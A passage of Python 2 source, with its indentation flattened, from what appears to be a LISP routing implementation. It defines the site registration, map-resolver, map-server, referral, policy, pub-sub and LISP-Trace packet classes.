"T": "Use Map-Register TTL field to timeout registration is {}set",
"R": "Merging registrations are {}requested",
"M": "ETR is {}a LISP Mobile-Node",
"N": "ETR is {}requesting Map-Notify messages from Map-Server"
}
class lisp_site():
def __init__(self):
self.site_name = ""
self.description = ""
self.shutdown = False
self.auth_sha1_or_sha2 = False
self.auth_key = {}
self.encryption_key = None
self.allowed_prefixes = {}
self.allowed_prefixes_sorted = []
self.allowed_rlocs = {}
self.map_notifies_sent = 0
self.map_notify_acks_received = 0
#enddef
#endclass
class lisp_site_eid():
def __init__(self, site):
self.site = site
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.first_registered = 0
self.last_registered = 0
self.last_registerer = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self.registered = False
self.registered_rlocs = []
self.auth_sha1_or_sha2 = False
self.individual_registrations = {}
self.map_registers_received = 0
self.proxy_reply_requested = False
self.force_proxy_reply = False
self.force_nat_proxy_reply = False
self.force_ttl = None
self.pitr_proxy_reply_drop = False
self.proxy_reply_action = ""
self.lisp_sec_present = False
self.map_notify_requested = False
self.mobile_node_requested = False
self.echo_nonce_capable = False
self.use_register_ttl_requested = False
self.merge_register_requested = False
self.xtr_id_present = False
self.xtr_id = 0
self.site_id = 0
self.accept_more_specifics = False
self.parent_for_more_specifics = None
self.dynamic = False
self.more_specific_registrations = []
self.source_cache = None
self.inconsistent_registration = False
self.policy = None
self.require_signature = False
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_flags(self, html):
if (html == False):
output = "{}-{}-{}-{}-{}-{}-{}".format( \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_register_ttl_requested else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node_requested else "m",
"N" if self.map_notify_requested else "n")
else:
bits = self.print_flags(False)
bits = bits.split("-")
output = ""
for bit in bits:
bit_str = lisp_site_flags[bit.upper()]
bit_str = bit_str.format("" if bit.isupper() else "not ")
output += lisp_span(bit, bit_str)
if (bit.lower() != "n"): output += "-"
#endfor
#endif
return(output)
#enddef
def copy_state_to_parent(self, child):
self.xtr_id = child.xtr_id
self.site_id = child.site_id
self.first_registered = child.first_registered
self.last_registered = child.last_registered
self.last_registerer = child.last_registerer
self.register_ttl = child.register_ttl
if (self.registered == False):
self.first_registered = lisp_get_timestamp()
#endif
self.auth_sha1_or_sha2 = child.auth_sha1_or_sha2
self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endif
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_mr() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Now calculate checksum for verification.
#
